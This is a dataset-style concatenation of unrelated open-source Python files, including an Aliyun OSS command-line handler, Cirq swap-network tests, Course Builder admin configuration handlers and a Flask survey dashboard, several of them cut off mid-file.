if opt == "raw": return vals
return (vals[0]/22.5, vals[1]/22.5)
# ADC
def getSharp(self, i, opt = None): # i = ([1 - 2])
# read sensor value
d = self.getSensor(lambda : objs["ADC"].read_channel(3 - i))
if opt == "raw": return d
# convert data into cm
d /= 100 # less zeros in equation
if i == 1: d = (-d/2.065 + 9.62)*d*d - 65.3754*d + 159.2
if i == 2: d = (-d/11.56 + 2 )*d*d - 17 *d + 61.6
return int(d * 1000) / 1000 # 3 float digits
def getBattery(self): return self.getSharp(0, "raw")
# Buttons
# (i, v) = ([1 - 3], [0 - 100])
def setRedLED(_, i, v): objs["Button%i" % i].setRedLED(int(v))
def setGreenLED(_, i, v): objs["Button%i" % i].setGreenLED(int(v))
def waitForBtnPress(_, i): objs["Button%i" % i].waitForButtonPress()
def waitForBtnRelease(_, i): objs["Button%i" % i].waitForButtonRelease()
def waitForBtn(_, i): objs["Button%i" % i].waitForButton()
def isBtnPressed(_, i): return objs["Button%i" % i].isPressed()
else:
class _Methods(BaseMethods):
def cleanup(_): pass
Methods = _Methods()
# call method from Methods object
def callMethod(method, *args):
if hasattr(Methods, method):
return getattr(Methods, method)(*args)
else:
error = AssertionError("\033[0;31mmethod '%s' not found\033[0;37m" % method)
raise error
|
jkonecny12/anaconda | pyanaconda/payload/dnf/__init__.py | Python | gpl-2.0 | 1,037 | 0 | #
# Copyright (C) 2020 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject t | o the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.payload.dnf.payload import DNFPayload
| __all__ = ["DNFPayload"]
|
gplayersv/pypop | pypop/example/project_to_test/tests/pageobjects/login.py | Python | gpl-2.0 | 533 | 0 | import os
from s | elenium.webdriver.common.by import By
from pypop.pageobjects.base_page_object import PageObject
from pypop.pageobjects.base_page_element import InputField, PasswordField
class LoginPageObject(PageObject):
'''Page object for the login page'''
url = 'file:///' + os.path.dirname(__file__) + '/../../login.html'
username = InputField(By.ID, 'username')
password = PasswordField(By.ID, 'password')
| btn_login = InputField(By.ID, 'btn-login')
def go_to(self):
self.driver.get(self.url)
|
lufornpy/aliyun-cli | aliyuncli/ossadp/ossHandler.py | Python | apache-2.0 | 88,246 | 0.004657 | #!/usr/bin/env python
#coding=utf-8
# Copyright (C) 2011, Alibaba Cloud Computing
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from oss.oss_api import *
from oss.oss_util import *
from oss.oss_xml_handler import *
from aliyunCliParser import aliyunCliParser
import signal
import ConfigParser
from optparse import OptionParser
from optparse import Values
import os
import re
import time
import Queue
import sys
import socket
import shutil
reload(sys)
sys.setdefaultencoding("utf-8")
CMD_LIST = {}
HELP_CMD_LIST = ['--help','-h','help']
ACL_LIST = ['private', 'public-read', 'public-read-write']
OSS_PREFIX = 'oss://'
CONFIGFILE = "%s/.aliyuncli/osscredentials" % os.path.expanduser('~')
CONFIGSECTION = 'OSSCredentials'
DEFAUL_HOST = "oss.aliyuncs.com"
OSS_HOST = DEFAUL_HOST
ID = ""
KEY = ""
STS_TOKEN = None
TOTAL_PUT = AtomicInt()
PUT_OK = AtomicInt()
PUT_FAIL = AtomicInt()
PUT_SKIP = AtomicInt()
FILE_NUM_TOTAL = AtomicInt()
FILE_NUM_OK = AtomicInt()
GET_OK = AtomicInt()
GET_FAIL = AtomicInt()
GET_SKIP = AtomicInt()
DELETE_OK = AtomicInt()
COPY_OK = AtomicInt()
SEND_BUF_SIZE = 8192
RECV_BUF_SIZE = 1024*1024*10
MAX_OBJECT_SIZE = 5*1024*1024*1024
MAX_RETRY_TIMES = 3
IS_DEBUG = False
ERROR_FILE_LIST = []
AUTO_DUMP_FILE_NUM = 50
RET_OK = 0
RET_FAIL = -1
RET_SKIP = 1
lock = threading.Lock()
HELP = \
'''The valid command as follows::
GetAllBucket
CreateBucket oss://bucket --acl [acl] --location [location]
DeleteBucket oss://bucket
DeleteWholeBucket oss://bucket
GetBucketLocation oss://bucket
PutBucketCors oss://bucket localfile
GetBucketCors oss://bucket
DeleteBucketCors oss://bucket
PutBucketLogging oss://source_bucket oss://target_bucket/[prefix]
GetBucketLogging oss://bucket
DeleteBucketLogging oss://bucket
PutBucketWebsite oss://bucket indexfile [errorfile]
GetBucketWebsite oss://bucket
DeleteBucketWebsite oss://bucket
PutBucketLifeCycle oss://bucket localfile
GetBucketLifeCycle oss://bucket
DeleteBucketLifeCycle oss://bucket
PutBucketReferer oss://buc | ket --allow_empty_referer true --referer "referer1,referer2,...,refererN"
GetBucketReferer oss://bucket
GetAcl oss://bucket
SetAcl oss://bucket -- | acl [acl]
allow private, public-read, public-read-write
List oss://bucket/[prefix] [marker] [delimiter] [maxkeys]
oss://bucket/[prefix] --marker xxx --delimiter xxx --maxkeys xxx
MkDir oss://bucket/dirname
ListAllObject oss://bucket/[prefix]
ListAllDir oss://bucket/[prefix]
DeleteAllObject oss://bucket/[prefix] --force false
DownloadAllObject oss://bucket/[prefix] localdir --replace false --thread_num 5
DownloadToDir oss://bucket/[prefix] localdir --replace false --temp_dir xxx --thread_num 5
UploadObjectFromLocalDir localdir oss://bucket/[prefix] --check_point check_point_file --replace false --check_md5 false --thread_num 5
Put oss://bucket/object --content_type [content_type] --headers \"key1:value1#key2:value2\" --check_md5 false
Get oss://bucket/object localfile
MultiGet oss://bucket/object localfile --thread_num 5
Cat oss://bucket/object
Meta oss://bucket/object
Info oss://bucket/object
Copy oss://source_bucket/source_object oss://target_bucket/target_object --headers \"key1:value1#key2:value2\"
CopyLargeFile oss://source_bucket/source_object oss://target_bucket/target_object --part_size 10*1024*1024 --upload_id xxx
CopyBucket oss://source_bucket/[prefix] oss://target_bucket/[prefix] --headers \"key1:value1\" --replace false
Delete oss://bucket/object
SignUrl oss://bucket/object --timeout [timeout_seconds]
CreateLinkFromFile oss://bucket/object object_name_list_file
CreateLink oss://bucket/object object1 object2 ... objectN
GetLinkIndex oss://bucket/object
Options oss://bucket/[object] --origin xxx --method [GET, PUT, DELETE, HEAD, POST]
UploadDisk localdir oss://bucket/[prefix] [--check_point check_point_file --filename filename_file --replace false --content_type xxx --skip_dir false --skip_suffix false --out xxx] --device_id xxx --check_md5 false
Init oss://bucket/object
ListPart oss://bucket/object --upload_id xxx
ListParts oss://bucket
GetAllPartSize oss://bucket
Cancel oss://bucket/object --upload_id xxx
MultiUpload localfile oss://bucket/object --upload_id xxx --thread_num 10 --max_part_num 1000 --check_md5 false
UploadPartFromFile localfile oss://bucket/object --upload_id xxx --part_number xxx
UploadPartFromString oss://bucket/object --upload_id xxx --part_number xxx --data xxx
Config --host oss.aliyuncs.com --accessid accessid --accesskey accesskey --sts_token token
'''
def print_result(cmd, res):
'''
Print HTTP Response if failedd.
'''
try:
if res.status / 100 == 2:
pass
else:
body = res.read()
print "Error Headers:\n"
print res.getheaders()
print "Error Body:\n"
print body[0:1024]
print "Error Status:\n"
print res.status
print cmd, "Failed!"
if res.status == 403:
check_endpoint_error(body)
exit(-1)
except AttributeError:
pass
def format_size(size):
size = float(size)
coeffs = ['K', 'M', 'G', 'T']
coeff = ""
while size > 2048:
size /= 1024
coeff = coeffs.pop(0)
return str("%.2f"%size) + coeff + "B"
def format_utf8(string):
string = smart_code(string)
if isinstance(string, unicode):
string = string.encode('utf-8')
return string
def split_path(path):
if not path.lower().startswith(OSS_PREFIX):
print "%s parameter %s invalid, " \
"must be start with %s" % \
(args[0], args[1], OSS_PREFIX)
sys.exit(1)
pather = path[len(OSS_PREFIX):].split('/')
return pather
def check_upload_id(upload_id):
upload_id_len = 32
if len(upload_id) != upload_id_len:
print "upload_id is a 32-bit string generated by OSS"
print "you can get valid upload_id by init or listparts command"
sys.exit(1)
def check_bucket(bucket):
if len(bucket) == 0:
print "Bucket should not be empty!"
print "Please input oss://bucket"
sys.exit(1)
def check_object(object):
if len(object) == 0:
print "Object should not be empty!"
print "Please input oss://bucket/object"
sys.exit(1)
if object.startswith("/"):
print "object name should not begin with / "
|
quantumlib/Cirq | cirq-core/cirq/contrib/acquaintance/shift_swap_network_test.py | Python | apache-2.0 | 11,590 | 0.00099 | # Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import random
import pytest
import cirq
import cirq.contrib.acquaintance as cca
def random_part_lens(max_n_parts, max_part_size):
return tuple(random.randint(1, max_part_size) for _ in range(random.randint(1, max_n_parts)))
@pytest.mark.parametrize(
'left_part_lens,right_part_lens',
[tuple(random_part_lens(7, 2) for _ in ('left', 'right')) for _ in range(5)],
)
def test_shift_swap_network_gate_acquaintance_opps(left_part_lens, right_part_lens):
gate = cca.ShiftSwapNetworkGate(left_part_lens, right_part_lens)
n_qubits = gate.qubit_count()
qubits = cirq.LineQubit.range(n_qubits)
strategy = cirq.Circuit(gate(*qubits))
# actual_opps
initial_mapping = {q: i for i, q in enumerate(qubits)}
actual_opps = cca.get_logical_acquaintance_opportunities(strategy, initial_mapping)
# expected opps
i = 0
sides = ('left', 'right')
parts = {side: [] for side in sides}
for side, part_lens in zip(sides, (left_part_lens, right_part_lens)):
for part_len in part_lens:
parts[side].append(set(range(i, i + part_len)))
i += part_len
expected_opps = set(
frozenset(left_part | right_part)
for left_part, right_part in itertools.product(parts['left'], parts['right'])
)
assert actual_opps == expected_opps
circuit_diagrams = {
(
'undecomposed',
(1,) * 3,
(1,) * 3,
): """
0: ───(0, 0, 0)↦(1, 0, 0)───
│
1: ───(0, 1, 0)↦(1, 1, 0)───
│
2: ───(0, 2, 0)↦(1, 2, 0)───
│
3: ───(1, 0, 0)↦(0, 0, 0)───
│
4: ───(1, 1, 0)↦(0, 1, 0)───
│
5: ───(1, 2, 0)↦(0, 2, 0)───
""",
(
'decomposed',
(1,) * 3,
(1,) * 3,
): """
0: ───────────────────────█───╲0╱───────────────────────
│ │
1: ─────────────█───╲0╱───█───╱1╲───█───╲0╱─────────────
│ │ │ │
2: ───█───╲0╱───█───╱1╲───█───╲0╱───█───╱1╲───█───╲0╱───
│ │ │ │ │ │
3: ───█───╱1╲───█───╲0╱───█───╱1╲───█───╲0╱───█───╱1╲───
│ │ │ │
4: ─────────────█───╱1╲───█───╲0╱───█───╱1╲─────────────
│ │
5: ───────────────────────█───╱1╲───────────────────────
""",
(
'undecomposed',
(2,) * 3,
(2,) * 3,
): """
0: ────(0, 0, 0)↦(1, 0, 0)───
│
1: ────(0, 0, 1)↦(1, 0, 1)───
│
2: ────(0, 1, 0)↦(1, 1, 0)───
│
3: ────(0, 1, 1)↦(1, 1, 1)───
│
4: ────(0, 2, 0)↦(1, 2, 0)───
│
5: ────(0, 2, 1)↦(1, 2, 1)───
│
6: ────(1, 0, 0)↦(0, 0, 0)───
│
7: ────(1, 0, 1)↦(0, 0, 1)───
│
8: ────(1, 1, 0)↦(0, 1, 0)───
│
9: ────(1, 1, 1)↦(0, 1, 1)───
│
10: ───(1, 2, 0)↦(0, 2, 0)───
│
11: ───(1, 2, 1)↦(0, 2, 1)───
""",
(
'decomposed',
(2,) * 3,
(2,) * 3,
): """
0: ────────────────────────█───╲0╱───────────────────────
│ │
1: ────────────────────────█───╲1╱───────────────────────
│ │
2: ──────────────█───╲0╱───█───╱2╲───█───╲0╱─────────────
│ │ │ │ │ │
3: ──────────────█───╲1╱───█───╱3╲───█───╲1╱─────────────
│ │ │ │
4: ────█───╲0╱───█───╱2╲───█───╲0╱───█───╱2╲───█───╲0╱───
│ │ │ │ │ │ │ │ │ │
5: ────█───╲1╱───█───╱3╲───█───╲1╱───█───╱3╲───█───╲1╱───
│ │ │ │ │ │
6: ────█───╱2╲───█───╲0╱───█───╱2╲───█───╲0╱───█───╱2╲───
│ │ │ │ │ │ │ │ │ │
7: ────█───╱3╲───█───╲1╱───█───╱3╲───█───╲1╱───█───╱3╲───
│ │ │ │
8: ──────────────█───╱2╲───█───╲0╱───█───╱2╲─────────────
│ │ │ │ │ │
9: ──────────────█───╱3╲───█───╲1╱───█───╱3╲─────────────
│ │
10: ───────────────────────█───╱2╲───────────────────────
│ │
11: ───────────────────────█───╱3╲───────────────────────
""",
(
'undecomposed',
(1, 2, 2),
(2, 1, 2),
): """
0: ───(0, 0, 0)↦(1, 0, 0)───
│
1: ───(0, 1, 0)↦(1, 1, 0)───
│
2: ───(0, 1, 1)↦(1, 1, 1)───
│
3: ───(0, 2, 0)↦(1, 2, 0)───
│
4: ───(0, 2, 1)↦(1, 2, 1)───
│
5: ───(1, 0, 0)↦(0, 0, 0)───
│
6: ───(1, 0, 1)↦(0, 0, 1)───
│
7: ───(1, 1, 0)↦(0, 1, 0)───
│
8: ───(1, 2, 0)↦(0, 2, 0)───
│
9: ───(1, 2, 1)↦(0, 2, 1)───
""",
(
'decomposed',
(1, 2, 2),
(2, 1, 2),
): """
0: ───────────────────────█───╲0╱───────────────────────
│ │
1: ─────────────█───╲0╱───█───╱1╲───────────────────────
│ │ │ │
2: ─────────────█───╲1╱───█───╱2╲───█───╲0╱─────────────
│ │ │ │
3: ───█───╲0╱───█───╱2╲───█───╲0╱───█───╱1╲───█───╲0╱───
│ │ │ │ │ │ │ │
4: ───█───╲1╱───█───╱3╲───█───╲1╱───█───╲0╱───█───╱1╲───
│ │ │ │ │ │ │ │
5: ───█───╱2╲───█───╲0╱───█───╱2╲───█───╲1╱───█───╱2╲───
│ │ │ │ │ │
6: ───█───╱3╲───█───╲1╱───█───╲0╱───█───╱2╲─────────────
│ │ │ │ │ │
7: ─────────────█───╱2╲───█───╲1╱───█───╱3╲─────────────
│ │
8: ───────────────────────█───╱2╲───────────────────────
│ │
9: ───────────────────────█───╱3╲───────────────────────
""",
}
@pytest.mark.parametrize('left_part_lens,right_part_lens', set(key[1:] for key in circuit_diagrams))
def test_shift_swap_network_gate_diagrams(left_part_lens, right_part_lens):
gate = cca.ShiftSwapNetworkGate(left_part_lens, right_part_lens)
n_qubits = gate.qubit_count()
qubits = cirq.LineQubit.range(n_qubits)
circuit = cirq.Circuit(gate(*qubits))
diagram = circuit_diagrams['undecomposed', left_part_lens, right_part_lens]
cirq.testing.assert_has_diagram(circuit, diagram)
cca.expose_acquaintance_gates(circuit)
diagram = circuit_diagrams['decomposed', left_part_lens, right_part_lens]
cirq.testing.assert_has_diagram(circuit, diagram)
def test_shift_swap_network_gate_bad_part_lens():
with pytest.raises(ValueError):
cca.ShiftSwapNetworkGate((0, 1, 1), (2, 2))
with pytest.raises(ValueError):
cca.ShiftSwapNetworkGate((-1, 1, 1), (2, 2))
with pytest.raises(ValueError):
cca.ShiftSwapNetworkGate((1, 1), (2, 0, | 2))
with pytest.raises(ValueError):
cca.ShiftSwapNetworkGate((1, 1), (2, -3))
@pytest.mark.parametrize(
'left_part_lens,right_part_lens',
[tuple(random_part_lens(2, 2) for _ in ('left', 'right')) for _ in range(5)],
)
def test_shift_swap_network_gate_repr(left_part_lens, right_part_lens):
gate = cca.ShiftSwapNetworkGate(left_part_lens, right_part_lens)
cirq.testing.assert_equivalent_repr(gate)
gate = cca.ShiftSwapNetworkGate(lef | t_part_lens, right_part_lens, cirq.ZZ)
cirq.testing.assert_equivalent_repr(gate)
@pytest.mark.parametrize(
'left_part_lens,right_part_lens',
[tuple(random_part_lens(2, 2) for _ in ('left', 'right')) for _ in range(5)],
)
def test_shift_swap_network_gate_permutation(left_part_lens, right_part_lens):
gate = cca.ShiftSwapNetworkGate(left_part_lens, right_part_lens)
n_qubits = gate.qubit_count()
cca.testing.assert_permutation_decomposition_equivalence(gate, n_qubits)
|
chrisguitarguy/GuitarSocieties.org | website/urls.py | Python | bsd-3-clause | 624 | 0.001603 | # -*- coding: utf-8 -*-
"""
Gu | itarSocieties.org
~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2014 Christopher Davis <http://christopherdavis.me>
:license: http://opensource.org/licenses/bsd-3-clause
"""
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
admin.site.site_header = _('Guitar Societies')
admin.site.site_title = _('Guitar Societies')
admin.site.index_title = _('Guitar Society Admin')
urlpatterns = patterns('',
url(r'^ | admin/', include(admin.site.urls)),
url(r'^', include('societies.urls', namespace='societies')),
)
|
haoyuchen1992/CourseBuilder | modules/admin/config.py | Python | apache-2.0 | 13,933 | 0 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes supporting configuration property editor and REST operations."""
__author__ = 'Pavel Simakov (psimakov@google.com)'
import cgi
import urllib
from controllers import sites
from controllers.utils import BaseRESTHandler
from controllers.utils import XsrfTokenManager
from models import config
from models import courses
from models import models
from models import roles
from models import transforms
from modules.oeditor import oeditor
from google.appengine.api import users
from google.appengine.ext import db
# This is a template because the value type is not yet known.
SCHEMA_JSON_TEMPLATE = """
{
"id": "Configuration Property",
"type": "object",
"description": "Configuration Property Override",
"properties": {
"name" : {"type": "string"},
"value": {"optional": true, "type": "%s"},
"is_draft": {"type": "boolean"}
}
}
"""
# This is a template because the doc_string is not yet known.
SCHEMA_ANNOTATIONS_TEMPLATE = [
(['title'], 'Configuration Property Override'),
(['properties', 'name', '_inputex'], {
'label': 'Name', '_type': 'uneditable'}),
oeditor.create_bool_select_annotation(
['properties', 'is_draft'], 'Status', 'Pending', 'Active',
description='<strong>Active</strong>: This value is active and '
'overrides all other defaults.<br/><strong>Pending</strong>: This '
'value is not active yet, and the default settings still apply.')]
class ConfigPropertyRights(object):
"""Manages view/edit rights for configuration properties."""
@classmethod
def can_view(cls):
return cls.can_edit()
@classmethod
def can_edit(cls):
return roles.Roles.is_super_admin()
@classmethod
def can_delete(cls):
return cls.can_edit()
@classmethod
def can_add(cls):
return cls.can_edit()
class ConfigPropertyEditor(object):
"""An editor for any configuration property."""
# Map of configuration property type into inputex type.
type_map = {str: 'string', int: 'integer', bool: 'boolean'}
@classmethod
def get_schema_annotations(cls, config_property):
"""Gets editor specific schema annotations."""
doc_string = '%s Default: \'%s\'.' % (
config_property.doc_string, config_property.default_value)
item_dict = [] + SCHEMA_ANNOTATIONS_TEMPLATE
item_dict.append((
['properties', 'value', '_inputex'], {
'label': 'Value', '_type': '%s' % cls.get_value_type(
config_property),
'description': doc_string}))
return item_dict
@classmethod
def get_value_type(cls, config_property):
"""Gets an editor specific type for the property."""
value_type = cls.type_map[config_property.value_type]
if not value_type:
raise Exception('Unknown type: %s', config_property.value_type)
if config_property.value_type == str and config_property.multiline:
return 'text'
return value_type
@classmethod
def get_schema_json(cls, config_property):
"""Gets JSON schema for | configuration property."""
return SCHEMA_JSON_TEMPLATE % cls.get_value_type(config_property)
def get_add_course(self):
"""Handles 'add_course' action and renders new course entry editor."""
exit_url = '/admin?action=courses'
rest_url = CoursesItemRESTHandler.URI
template_values = {}
template_values[
'page_title'] = 'Course Builder - Add Cour | se'
template_values['main_content'] = oeditor.ObjectEditor.get_html_for(
self, CoursesItemRESTHandler.SCHEMA_JSON,
CoursesItemRESTHandler.SCHEMA_ANNOTATIONS_DICT,
None, rest_url, exit_url,
auto_return=True,
save_button_caption='Add New Course')
self.render_page(template_values)
def get_config_edit(self):
"""Handles 'edit' property action."""
key = self.request.get('name')
if not key:
self.redirect('/admin?action=settings')
item = config.Registry.registered[key]
if not item:
self.redirect('/admin?action=settings')
template_values = {}
template_values[
'page_title'] = 'Course Builder - Edit Settings'
exit_url = '/admin?action=settings#%s' % cgi.escape(key)
rest_url = '/rest/config/item'
delete_url = '/admin?%s' % urllib.urlencode({
'action': 'config_reset',
'name': key,
'xsrf_token': cgi.escape(self.create_xsrf_token('config_reset'))})
template_values['main_content'] = oeditor.ObjectEditor.get_html_for(
self, ConfigPropertyEditor.get_schema_json(item),
ConfigPropertyEditor.get_schema_annotations(item),
key, rest_url, exit_url, delete_url=delete_url)
self.render_page(template_values)
def post_config_override(self):
"""Handles 'override' property action."""
name = self.request.get('name')
# Find item in registry.
item = None
if name and name in config.Registry.registered.keys():
item = config.Registry.registered[name]
if not item:
self.redirect('/admin?action=settings')
# Add new entity if does not exist.
try:
entity = config.ConfigPropertyEntity.get_by_key_name(name)
except db.BadKeyError:
entity = None
if not entity:
entity = config.ConfigPropertyEntity(key_name=name)
entity.value = str(item.value)
entity.is_draft = True
entity.put()
models.EventEntity.record(
'override-property', users.get_current_user(), transforms.dumps({
'name': name, 'value': str(entity.value)}))
self.redirect('/admin?%s' % urllib.urlencode(
{'action': 'config_edit', 'name': name}))
def post_config_reset(self):
"""Handles 'reset' property action."""
name = self.request.get('name')
# Find item in registry.
item = None
if name and name in config.Registry.registered.keys():
item = config.Registry.registered[name]
if not item:
self.redirect('/admin?action=settings')
# Delete if exists.
try:
entity = config.ConfigPropertyEntity.get_by_key_name(name)
if entity:
old_value = entity.value
entity.delete()
models.EventEntity.record(
'delete-property', users.get_current_user(),
transforms.dumps({
'name': name, 'value': str(old_value)}))
except db.BadKeyError:
pass
self.redirect('/admin?action=settings')
class CoursesItemRESTHandler(BaseRESTHandler):
"""Provides REST API for course entries."""
URI = '/rest/courses/item'
SCHEMA_JSON = """
{
"id": "Course Entry",
"type": "object",
"description": "Course Entry",
"properties": {
"name": {"type": "string"},
"title": {"type": "string"},
"admin_email": {"type": "string"}
}
}
"""
SCHEMA_DICT = transforms.loads(SCHEMA_JSON)
SCHEMA_ANNOTATIONS_DICT = [
(['title'], 'New Course Entry'),
(['properties', 'name', '_inputex'], {'label': 'Unique Name'}),
|
codeforamerica/mdc-feedback | feedback/dashboard/views.py | Python | mit | 18,098 | 0.00116 | # -*- coding: utf-8 -*-
import arrow
import datetime
import ujson
import timeit
from flask.ext.login import login_required
from flask import (
Blueprint, render_template
)
from feedback.dashboard.vendorsurveys import (
get_rating_scale, get_surveys_by_role,
get_surveys_by_completion, get_surveys_by_purpose,
get_all_survey_responses, get_rating_by_lang,
get_rating_by_purpose, get_rating_by_role
)
from feedback.surveys.constants import SURVEY_DAYS
from feedback.surveys.models import Survey
from feedback.dashboard.permits import (
api_health, get_lifespan,
get_permit_types, trade,
get_master_permit_counts,
dump_socrata_api
)
blueprint = Blueprint(
"dashboard", __name__,
template_folder='../templates',
static_folder="../static"
)
def to_bucket(str_date):
''' Converts the DB string time to a MM-DD string format.
'''
result = arrow.get(str_date)
return result.strftime("%m-%d")
@blueprint.route("/", methods=["GET", "POST"])
def home():
json_obj = {}
json_obj_home = {}
surveys_by_date = {}
surveys_date_array = []
surveys_value_array = []
for i in range(SURVEY_DAYS, -1, -1):
time_i = (datetime.date.today() - datetime.timedelta(i))
date_index = time_i.strftime("%m-%d")
surveys_by_date[date_index] = 0
surveys_date_array.append(date_index)
survey_table = get_all_survey_responses(SURVEY_DAYS)
sms_rows = [x.lang for x in survey_table if x.method == 'sms']
web_rows = [x.lang for x in survey_table if x.method == 'web']
# ANALYTICS CODE
for i in range(SURVEY_DAYS, -1, -1):
time_i = (datetime.date.today() - datetime.timedelta(i))
date_index = time_i.strftime("%m-%d")
surveys_value_array.append(
len([x for x in survey_table if to_bucket(x.date_submitted) == date_index]))
dashboard_collection_home = [
{
"id": "graph",
"title": "Surveys Submitted".format(SURVEY_DAYS),
"data": {
"graph": {
"datetime": {
"data": surveys_date_array
},
"series": [
{
"data": surveys_value_array
}
]
}
}
},
{
"title": "Satisfaction Rating".format(SURVEY_DAYS),
"data": "{0:.2f}".format(get_rating_scale(survey_table))
},
{
"title": "Survey Type".format(SURVEY_DAYS),
"data": {
"web_en": web_rows.count('en'),
"web_es": web_rows.count('es'),
"sms_en": sms_rows.count('en'),
"sms_es": sms_rows.count('es')
},
"labels": {
"web_en": "Web (English)",
"web_es": "Web (Spanish)",
"sms_en": "Text (English)",
| "sms_es": "Text (Spanish)"
}
},
{},
{},
{},
{ | },
{},
{},
{},
{
"title": "Surveys by Survey Role",
"data": get_surveys_by_role(survey_table)
},
{},
{
"title": "How many completions?",
"data": get_surveys_by_completion(survey_table)
},
{
"title": "Respondents by Purpose",
"data": get_surveys_by_purpose(survey_table)
},
{
"title": "Ratings",
"data": {
"en": get_rating_by_lang(survey_table, 'en'),
"es": get_rating_by_lang(survey_table, 'es'),
"p1": get_rating_by_purpose(survey_table, 1),
"p2": get_rating_by_purpose(survey_table, 2),
"p3": get_rating_by_purpose(survey_table, 3),
"p4": get_rating_by_purpose(survey_table, 4),
"p5": get_rating_by_purpose(survey_table, 5),
"contractor": get_rating_by_role(survey_table, 1),
"architect": get_rating_by_role(survey_table, 2),
"permitconsultant": get_rating_by_role(survey_table, 3),
"homeowner": get_rating_by_role(survey_table, 4),
"bizowner": get_rating_by_role(survey_table, 5)
}
}
]
json_obj_home['daily_graph'] = ujson.dumps(dashboard_collection_home[0]['data']['graph'])
json_obj_home['surveys_type'] = ujson.dumps(dashboard_collection_home[2])
json_obj_home['survey_role'] = ujson.dumps(dashboard_collection_home[10])
json_obj_home['survey_complete'] = ujson.dumps(dashboard_collection_home[12])
json_obj_home['survey_purpose'] = ujson.dumps(dashboard_collection_home[13])
today = datetime.date.today()
return render_template(
"public/home.html",
api=1,
date=today.strftime('%B %d, %Y'),
json_obj=json_obj_home,
dash_obj=dashboard_collection_home,
resp_obj=survey_table,
title='Dashboard - Main'
)
@blueprint.route("/metrics", methods=["GET", "POST"])
def metrics():
json_obj = {}
surveys_by_date = {}
surveys_date_array = []
surveys_value_array = []
for i in range(SURVEY_DAYS, -1, -1):
time_i = (datetime.date.today() - datetime.timedelta(i))
date_index = time_i.strftime("%m-%d")
surveys_by_date[date_index] = 0
surveys_date_array.append(date_index)
survey_table = get_all_survey_responses(SURVEY_DAYS)
sms_rows = [x.lang for x in survey_table if x.method == 'sms']
web_rows = [x.lang for x in survey_table if x.method == 'web']
# ANALYTICS CODE
for i in range(SURVEY_DAYS, -1, -1):
time_i = (datetime.date.today() - datetime.timedelta(i))
date_index = time_i.strftime("%m-%d")
surveys_value_array.append(
len([x for x in survey_table if to_bucket(x.date_submitted) == date_index]))
dashboard_collection = [
{
"id": "graph",
"title": "Surveys Submitted".format(SURVEY_DAYS),
"data": {
"graph": {
"datetime": {
"data": surveys_date_array
},
"series": [
{
"data": surveys_value_array
}
]
}
}
},
{
"title": "Satisfaction Rating".format(SURVEY_DAYS),
"data": "{0:.2f}".format(get_rating_scale(survey_table))
},
{
"title": "Survey Type".format(SURVEY_DAYS),
"data": {
"web_en": web_rows.count('en'),
"web_es": web_rows.count('es'),
"sms_en": sms_rows.count('en'),
"sms_es": sms_rows.count('es')
},
"labels": {
"web_en": "Web (English)",
"web_es": "Web (Spanish)",
"sms_en": "Text (English)",
"sms_es": "Text (Spanish)"
}
},
{
"title": "Commercial",
"data": {
"nc": get_lifespan('nc'),
"rc": get_lifespan('rc'),
"s": get_lifespan('s')
}
},
{
"title": "Residential",
"data": {
"nr": get_lifespan('nr'),
"rr": get_lifespan('rr'),
"p": get_lifespan('p'),
"f": get_lifespan('f'),
"e": get_lifespan('e')
}
},
{
"title": "Average time from application date to permit issuance, Owner/Builder Permits, Last 30 Days",
"data": 0
},
{
"title": "Same Day Trade Permits",
"data": {
"PLUM": trade(30, 'PLUM'),
"BLDG": trade(30, 'BLDG'),
"ELEC": trade(30, 'ELEC'),
"FIRE": trade(30, 'FIRE'),
"ZIPS": trade(30, 'ZIPS')
}
},
{
"title": "(U |
kylejusticemagnuson/pyti | pyti/linear_weighted_moving_average.py | Python | mit | 700 | 0.002857 | from __future__ import absolute_import
from pyti import catch_errors
from pyti.function_helper import fill_for_noncomputable_vals
from six.moves import range
def linear_weighted_moving_average(data, period):
    """
    Linear Weighted Moving Average.

    Formula:
    LWMA = SUM(DATA[i]) * i / SUM(i)

    Each window of *period* values is weighted 1..period, the most recent
    value receiving the largest weight.

